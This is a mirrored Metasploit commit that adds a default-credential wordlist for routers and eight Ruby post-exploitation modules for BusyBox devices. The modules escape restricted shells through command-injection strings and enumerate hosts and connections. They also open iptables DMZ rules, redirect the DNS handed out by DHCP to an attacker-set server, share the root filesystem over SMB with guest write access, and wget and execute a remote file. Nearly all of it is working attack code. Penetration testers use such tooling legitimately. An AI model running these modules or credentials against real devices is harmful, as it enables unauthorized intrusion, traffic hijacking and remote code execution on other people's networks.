1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers.

This commit is contained in:
jvicente 2015-08-10 18:29:41 +02:00
parent a611fff7bf
commit 5ff61ca5f3
9 changed files with 1094 additions and 0 deletions

View File

@ -0,0 +1,398 @@
debug synnet
tech tech
adminttd adminttd
admin comcomcom
admin admin
admin synnet
monitor monitor
manager manager
admin password
User Password
Administrator admin
security security
3comcso RIP000
recovery recovery
volition volition
Administrator 3ware
sysadm anicust
Admin admin
none 0
admin secure
kermit kermit
dhs3mt dhs3mt
at4400 at4400
mtch mtch
mtcl mtcl
root letacla
dhs3pms dhs3pms
adfexc adfexc
client client
install llatsni
halt tlah
admin switch
diag switch
root permit
ftp_inst pbxk1064
ftp_admi kilo1987
ftp_oper help1954
ftp_nmc tuxalize
manager friend
manager admin
Manager friend
none admin
admin linga
root root
user user
admin cableroot
acc acc
device device
apc apc
root admin
root alpine
admin 0
IntraSwitch Asante
IntraStack Asante
admin asante
readonly lucenttech2
root ascend
admin epicrouter
customer none
DTA TJM
admin atlantis
root ROOT500
diag danger
manuf xxyyzz
craft crftpw
root cms500
dadmin dadmin01
root pass
admin bintec
admin articon
patrol patrol
webadmin webadmin
installer installer
root fivranne
admin 1234
mediator mediator
root Mau'dib
cellit cellit
admin diamond
cmaker cmaker
admin changeme
netrangr attack
bbsd-client changeme2
bbsd-client NULL
Administrator changeme
root attack
admin default
Cisco Cisco
admin cisco
root blender
hsa hsadb
wlse wlsedb
root Cisco
admin system
user tivonpw
cisco cisco
administrator administrator
user user
operator operator
user public
PFCUser 240653C9467E45
corecess corecess
cgadmin cgadmin
super surt
root tslinux
D-Link D-Link
root tini
anonymous any@
root davox
davox davox
MDaemon MServer
root calvin
admin my_DEMARC
PBX PBX
NETWORK NETWORK
admin michelangelo
user password
draytek 1234
admin 123
login admin
login password
admin netadmin
tiger tiger123
websecadm changeme
netman netman
1111 1111
supervisor supervisor
anonymous Exabyte
root default
admin radius
admin isee
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MGR NETBASE
MGR REGO
MGR RJE
MGR CONV
OPERATOR SYS
OPERATOR DISC
OPERATOR SYSTEM
OPERATOR SUPPORT
OPERATOR COGNOS
PCUSER SYS
RSBCMON SYS
SPOOLMAN HPOFFICE
WP HPOFFICE
ADVMAIL HPOFFICE DATA
ADVMAIL HP
FIELD SUPPORT
FIELD MGR
FIELD SERVICE
FIELD MANAGER
FIELD HPP187 SYS
FIELD LOTUS
FIELD HPWORD PUB
FIELD HPONLY
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT
HELLO OP.OPERATOR
MAIL MAIL
MAIL REMOTE
MAIL TELESUP
MAIL HPOFFICE
MAIL MPE
MANAGER TCH
MANAGER SYS
MANAGER SECURITY
MANAGER ITF3000
MANAGER HPOFFICE
MANAGER COGNOS
MANAGER TELESUP
MGR SYS
MGR CAROLIAN
MGR VESOFT
MGR XLSERVER
MGR SECURITY
MGR TELESUP
MGR HPDESK
MGR CCC
MGR CNAS
MGR WORD
MGR COGNOS
MGR ROBELLE
MGR HPOFFICE
MGR HPONLY
admin hp.com
storwatch specialist
vt100 public
superadmin secret
hscroot abc123
USERID PASSW0RD
Administrator pilou
Administrator letmein
NICONEX NICONEX
setup setup
intel intel
admin hello
admin giraff
SYSDBA masterkey
intermec intermec
operator $chwarzepumpe
system sys
admin operator
admin ironport
JDE JDE
PRODDTA PRODDTA
netscreen netscreen
superuser 123456
admin 123456
sysadmin PASS
login access
comcast 1234
setup changeme
setup changeme!
super super
xxx cascade
admin Ascend
readwrite lucenttech1
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
admin AitbISP4eCiG
bciim bciimpw
bcim bcimpw
bcms bcmspw
bcnas bcnaspw
blue bluepw
browse browsepw
browse looker
craft craft
craft craftpw
cust custpw
enquiry enquirypw
field support
inads indspw
inads inads
init initpw
locate locatepw
maint maintpw
maint rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field
scmadmin scmchangeme
Administrator password
MICRO RSX
service smile
system password
cablecom router
admin motorola
router router
SYSADM sysadm
admin admin123
GlobalAdmin GlobalAdmin
super 5777364
superman 21241036
naadmin naadmin
netopia netopia
admin noway
admin NetCache
e500 e500changeme
e250 e250changeme
guest guest
admin asd
vcr NetVCR
m1122 m1122
telecom telecom
disttech 4tas
maint maint
mlusr mlusr
admin root
l2 l2
l3 l3
ro ro
rw rw
rwa rwa
admin setup
login 0
login 1111
login 8429
spcl 0
root 3ep5w2u
maint ntacdmax
ccrusr ccrusr
supervisor PlsChgMe!
266344 266344
supervisor PlsChgMe1
admin adslolitec
admin OCS
adminstat OCS
adminview OCS
adminuser OCS
helpdesk OCS
sys uplink
cac_admin cacadmin
system sys
manager change_on_install
admin kont2004
Manager Manager
sysadm sysadm
write private
debug d.e.b.u.g
echo echo
PSEAdmin $secure$
admin superuser
admin mu
admin microbusiness
admin smallbusiness
Polycom SpIp
support h179350
lp lp
radware radware
wradmin trancell
piranha q
piranha piranha
sysadmin password
setup changeme
teacher password
temp1 password
admin rmnetlm
admin2 changeme
adminstrator changeme
deskalt password
deskman changeme
desknorm password
deskres password
replicator replicator
RMUser1 password
topicalt password
topicnorm password
topicres password
root 1234
public public
admin w2402
GEN1 gen1
GEN2 gen2
ADMN admn
eng engineer
op op
op operator
su super
poll tech
sysadmin sysadmin
admin pwp
superuser admin
admin hagpolm1
Administrator ganteng
Administrator smcadmin
admin barricade
smc smcadmin
admin smcadmin
cusadmin highspeed
1.79 + Multi
aaa often blank
admin Protector
admin conexant
admin xad$l#12
root changeme
Sweex Mysweex
target password
install secret
super.super master
xbox xbox
telco telco
tellabs tellabs#1
root admin_1
tiara tiaranet
superman talent
admin extendnet
root 12345
cablemodem robotics
NAU NAU
ADMINISTRATOR ADMINISTRATOR
HTTP HTTP
Any 12345
support support
VTech VTech
admin visual
root 123456
CSG SESAME
user pass
admin sysAdmin
root wyse
VNC winterm
rapport r@p8p0r+
1502 1502
xd xd
admin 2222
admin 22222
admin 1111
admin zoomadsl
ZXDSL ZXDSL
1234 1234
webadmin 1234

View File

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Enumerate Connections',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will enumerate
the connections established by the hosts connected
to the router or device executing BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
found = false
conns_files =[
"/proc/net/nf_conntrack", "/proc/net/ip_conntrack", "/proc/net/tcp", "/proc/net/udp", "/proc/net/arp", "/proc/fcache/*"
]
vprint_status("Searching for files that store information about network connections.")
conns_files.each do |conns_file|
if file_exists(conns_file)
found = true
print_good("Connections File found: #{conns_file}.")
begin
str_file=read_file(conns_file)
vprint_line(str_file)
#Store file
p = store_loot("Connections", "text/plain", session, str_file, conns_file, "BusyBox Device Network Established Connections")
print_good("Connections saved to #{p}.")
rescue EOFError
# If there's nothing in the file, we hit EOFError
print_error("Nothing read from file #{conns_file}, file may be empty.")
end
end
end
if found == false
print_error("Nothing read from connection files, files may be empty.")
end
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end

View File

@ -0,0 +1,63 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Enumerate Hosts',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will enumerate
the hosts connected to the router or device executing
BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
hosts_file = nil
if file_exists("/var/hosts")
hosts_file = "/var/hosts"
elsif file_exists("/var/udhcpd/udhcpd.leases")
hosts_file = "/var/udhcpd/udhcpd.leases"
else
vprint_error("Files not found: /var/hosts, /var/udhcpd/udhcpd.leases.")
return
end
#File exists
begin
str_file=read_file(hosts_file)
print_good("Hosts File found: #{hosts_file}.")
vprint_line(str_file)
#Store file
p = store_loot("Hosts", "text/plain", session, str_file, hosts_file, "BusyBox Device Connected Hosts")
print_good("Hosts saved to #{p}.")
rescue EOFError
# If there's nothing in the file, we hit EOFError
print_error("Nothing read from file: #{hosts_file}, file may be empty.")
end
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end

View File

@ -0,0 +1,165 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Ping Network',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will ping a range of
ip adresses from the router or device executing BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptAddress.new('IPRANGESTART', [ true, "The first ip address of the range to ping.", nil ]),
OptAddress.new('IPRANGEEND', [ true, "The last ip address of the range to ping.", nil ])
], self.class)
end
def run
#this module will send a sh script for busybox shell for doing ping to a range of ip address from
#the router or device that is executing busybox. It could be possible to calculate each ip address
#of the range of ip addresses in the ruby script and execute each ping command with cmd_exec, but
#it would generate an unnecesary traffic in the connection with the busybox device (usually telnet)
sh_script_lines=[
"#!/bin/sh",
"param1=#{datastore['IPRANGESTART']}",
"param2=#{datastore['IPRANGEEND']}",
"while true;",
" param1cpy=\"$param1\"",
" pos=`expr index \"$param1cpy\" \".\"`",
" pos=`expr $pos - 1`",
" octec1=`expr substr \"$param1cpy\" 1 $pos`",
" pos=`expr $pos + 2`",
" len=`expr length \"$param1cpy\"`",
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
" pos=`expr index \"$param1cpy\" \".\"`",
" pos=`expr $pos - 1`",
" octec2=`expr substr \"$param1cpy\" 1 $pos`",
" pos=`expr $pos + 2`",
" len=`expr length \"$param1cpy\"`",
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
" pos=`expr index \"$param1cpy\" \".\"`",
" pos=`expr $pos - 1`",
" octec3=`expr substr \"$param1cpy\" 1 $pos`",
" pos=`expr $pos + 2`",
" len=`expr length \"$param1cpy\"`",
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
" octec4=\"$param1cpy\"",
" carry=0",
" len=`expr length \"$octec4\"`",
" temp=`expr match \"$octec4\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec4=0",
" carry=1",
" else",
" octec4=`expr $octec4 + 1`",
" fi",
" if [ $carry -eq 1 ]; then",
" carry=0",
" len=`expr length \"$octec3\"`",
" temp=`expr match \"$octec3\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec3=0",
" carry=1",
" else",
" octec3=`expr \"$octec3\" + 1`",
" fi",
" fi",
" if [ $carry -eq 1 ]; then",
" carry=0",
" len=`expr length \"$octec2\"`",
" temp=`expr match \"$octec2\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec2=0",
" carry=1",
" else",
" octec2=`expr $octec2 + 1`",
" fi",
" fi",
" if [ $carry -eq 1 ]; then",
" carry=0",
" len=`expr length \"$octec1\"`",
" temp=`expr match \"$octec1\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec1=0",
" carry=1",
" else",
" octec1=`expr $octec1 + 1`",
" fi",
" fi",
" ping -c 1 \"$param1\"",
" param1=\"$octec1\"\".\"\"$octec2\"\".\"\"$octec3\"\".\"\"$octec4\"",
" temp=`expr match \"$param1\" \"$param2\"`",
" len=`expr length \"$param2\"`",
" if [ $temp -eq $len ]; then",
" ping -c 1 \"$param1\"",
" break",
" fi",
"done"
]
begin
#send script and receive echos
count=0
sh_script_lines.each do |sh_script_line|
session.shell_write(sh_script_line + "\n")
count+=1
result=session.shell_read() #receive echos
vprint_status(result)
Rex::sleep(0.03)
end
rescue
print_error("Problems were found while sending script to the BusyBox device.")
return
end
Rex::sleep(1.00)
full_results = ""
begin
#receiving ping results
count=0
print_status("Script has been sent to the busybox device. Doing ping to the range of addresses.")
while count<15 #we stop when we have been 15 seconds without receiving responses
result = session.shell_read()
if result.length>0
count=0
print_status(result)
full_results << result
else
vprint_status("No response.")
count+=1
end
Rex::sleep(1.00)
end
rescue
print_warning("Problems were found while receiving ping results. Probably remote device terminated the connection.\nResults that were already received will be kept.")
end
#storing results
p = store_loot("Pingnet", "text/plain", session, full_results, "#{datastore['IPRANGESTART']}"+"-"+"#{datastore['IPRANGEEND']}", "BusyBox Device Network Range Pings")
print_good("Pingnet results saved to #{p}.")
end
end

View File

@ -0,0 +1,64 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize
super(
'Name' => 'BusyBox Jailbreak ',
'Description' => 'This module will send a set of commands to a open
session that is connected to a BusyBox limited shell
(i.e. a router limited shell). It will try different
known tricks to try to jailbreak the limited shell and
get a full sh busybox shell.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
bfound = false
bfound = try_command("cat xx || sh\n","1_1") unless bfound
bfound = try_command("ping || sh\n","1_2") unless bfound
bfound = try_command("echo `sh >> /dev/ttyp0`\n","2_1") unless bfound
bfound = try_command("ping `sh >> /dev/ttyp0`\n","2_2") unless bfound
bfound = try_command("cat `sh >> /dev/ttyp0`\n","2_3") unless bfound
bfound = try_command("cat xx;sh\n","3_1") unless bfound
bfound = try_command("echo xx;sh\n","3_2") unless bfound
bfound = try_command("ping;sh\n","3_3") unless bfound
bfound = try_command("cat xx | sh\n","4_1") unless bfound
bfound = try_command("ping | sh\n","4_2") unless bfound
bfound = try_command("cat ($sh)\n","5_1") unless bfound
bfound = try_command("echo ($sh) xx\n","5_2") unless bfound
bfound = try_command("ping ($sh)\n","5_3") unless bfound
bfound = try_command("cat xx &amp;&amp; sh\n","6_1") unless bfound
bfound = try_command("echo xx &amp;&amp; sh\n","6_2") unless bfound
bfound = try_command("ping &amp;&amp; sh\n","3_3") unless bfound
print_error("Unable to jailbreak device shell.") if !bfound
end
def try_command(param_command, method_number)
vprint_status("jailbreak sent: #{param_command}.")
session.shell_write(param_command)
(1..10).each do
resp = session.shell_read()
vprint_status("jailbreak received: #{resp}.")
if ((resp.include? "BusyBox") && (resp.include? "Built-in shell"))
vprint_status("Done method " + method_number + ".")
return true
end
end
return false
end
end

View File

@ -0,0 +1,49 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize
super(
'Name' => 'BusyBox Set Dmz',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will enable or disable dmz
to a network host in the router or device executing BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options([
OptAddress.new('TARGETHOST', [ true, "The address of the host to be target for the dmz", nil ]),
OptBool.new('DELETE', [false, "If this option is set to true, the DMZ is removed. Else it is added.", false])
], self.class)
end
def run
if datastore['DELETE'] == true
vprint_status("Executing iptables to delete dmz.")
vprint_status(cmd_exec("iptables -D FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
else
vprint_status("Executing iptables to add dmz.")
vprint_status(cmd_exec("iptables -A FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
end
if datastore['VERBOSE']
vprint_status(cmd_exec("iptables --list"))
end
print_good("Dmz modified. Enable verbose for additional information.")
end
end

View File

@ -0,0 +1,124 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Set Dns',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will set dns addresses
to the router or device executing BusyBox to be sent
by dhcp server to network hosts.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptAddress.new('SRVHOST', [ true, "The dns server address.", nil ])
], self.class)
end
#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
def run
workdone = false
vprint_status("Searching for files to modify dns server.")
if file_exists("/etc/resolv.conf")
vprint_status("Resolv.conf found.")
if is_writable_and_write("/etc/resolv.conf", "nameserver #{datastore['SRVHOST']}", false)
print_good("Dns server added to resolv.conf.")
workdone = true
end
end
if file_exists("/etc/udhcpd.conf")
vprint_status("Udhcpd.conf found.")
original_content = read_file("/etc/udhcpd.conf")
vprint_status("Original udhcpd.conf content:")
vprint_status(original_content)
if is_writable_and_write("/etc/udhcpd.conf", "option dns #{datastore['SRVHOST']}", false)
vprint_status("Udhcpd.conf is writable.")
is_writable_and_write("/etc/udhcpd.conf", original_content, true)
vprint_status("Relaunching udhcp server:")
cmd_exec("killall dhcpd\n")
cmd_exec("dhcpd /etc/udhcpd.conf &\n")
print_good("Udhcpd.conf modified and dns server added. Dhcpd restarted.")
else
vprint_status("Unable to write udhcpd.conf. Trying to copy the file to a writable directory.")
writable_directory = nil
vprint_.status("Trying to find writable directory.")
writable_directory = "/etc/" if is_writable_and_write("/etc/tmp.conf", "x", false)
writable_directory = "/mnt/" if (!writable_directory && is_writable_and_write("/mnt/tmp.conf", "x", false))
writable_directory = "/var/" if (!writable_directory && is_writable_and_write("/var/tmp.conf", "x", false))
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_and_write("/var/tmp/tmp.conf", "x", false))
if writable_directory
vprint_status("writable directory found, creating a copy of the original udhcpd.conf.")
is_writable_and_write("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", false)
is_writable_and_write("#{writable_directory}tmp.conf", original_content, true)
vprint_status("Relaunching udhcp server:")
cmd_exec("killall dhcpd\n")
cmd_exec("dhcpd #{writable_directory}tmp.conf &\n")
print_good("Udhcpd.conf copied to writable directory and dns server added. Dhcpd restarted.")
workdone = true
else
vprint_error("Writable directory not found.")
end
end
end
if !workdone
print_error("Unable to modify dns server.")
end
end
#This function checks if the target file is writable and writes or append the data given as parameter.
#BusyBox shell's commands are limited and Msf > Post > File > write_file function doesnt work here, for
#this reason it is necessary to implement an specific function
def is_writable_and_write(file_path, data, append)
if append
data = read_file(file_path) + "\n" + data
end
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
session.shell_write("echo #{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
session.shell_read(); Rex::sleep(0.1)
if read_file(file_path).include? rand_str
session.shell_write("echo \"\"> #{file_path}\n"); Rex::sleep(0.1)
session.shell_read(); Rex::sleep(0.1)
lines = data.lines.map(&:chomp)
lines.each do |line|
session.shell_write("echo #{line.chomp} >> #{file_path}\n"); Rex::sleep(0.1)
session.shell_read(); Rex::sleep(0.1)
end
return true
else
return false
end
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end

View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Smb Share Root',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will modify the
smb configuration of the the router or device executing
BusyBox to share the root directory of the device.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
vprint_status("Trying to find smb.conf.")
if read_file("/var/samba/smb.conf").length > 0 #file? doesnt work because test -f is not implemented in busybox
vprint_status("Smb.conf found.")
vprint_status("Trying to find writable directory.")
writable_directory = nil
writable_directory = "/etc/" if is_writable_directory("/etc")
writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
if writable_directory
vprint_status("writable directory found, copying smb.conf.")
vprint_status(cmd_exec("rm -f #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("cp -f /var/samba/smb.conf #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("echo -e '[rootdir]\ncomment = rootdir\npath = /\nbrowseable = yes\nwriteable = yes\nguest ok = yes\n' >> #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("killall smbd")); Rex::sleep(0.1)
vprint_status(cmd_exec("smbd -D -s #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("smbd -D -s=#{writable_directory}smb.conf")); Rex::sleep(0.1)
print_good("Smb configuration has been modified.")
else
print_error("Writable directory not found.")
end
else
print_error("Smb.conf not found.")
end
end
#This function checks if the target directory is writable
def is_writable_directory(directory_path)
retval = false
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
file_path = directory_path + "/" + rand_str
session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
(1..5).each{session.shell_read(); Rex::sleep(0.1)}
rcv = read_file(file_path)
vprint_status("is_writable_directory:"+rcv)
if rcv.include? (rand_str+"XXX"+rand_str)
retval = true
end
cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
return retval
end
end

View File

@ -0,0 +1,89 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Wget and Exec',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will use wget to download
a file to the router or device executing BusyBox and then
it executes the download file.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptString.new('URL', [true, 'Full URL of file to download.'])
], self.class)
end
#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
def run
vprint_status("Trying to find writable directory.")
writable_directory = nil
writable_directory = "/etc/" if is_writable_directory("/etc")
writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
if writable_directory
vprint_status("writable directory found, downloading file.")
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
random_file_path = writable_directory + rand_str
cmd_exec("wget -O #{random_file_path} #{datastore['URL']}"); Rex::sleep(0.1)
if file_exists(random_file_path)
print_good("File downloaded using wget. Executing it.")
cmd_exec("chmod 777 #{random_file_path}"); Rex::sleep(0.1)
vprint_status(cmd_exec("sh #{random_file_path}"))
else
print_error("Unable to download file.")
end
else
print_error("Writable directory not found.")
end
end
#This function checks if the target directory is writable
def is_writable_directory(directory_path)
retval = false
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
file_path = directory_path + "/" + rand_str
session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
(1..5).each{session.shell_read(); Rex::sleep(0.1)}
rcv = read_file(file_path)
vprint_status("is_writable_directory:"+rcv)
if rcv.include? (rand_str+"XXX"+rand_str)
retval = true
end
cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
return retval
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end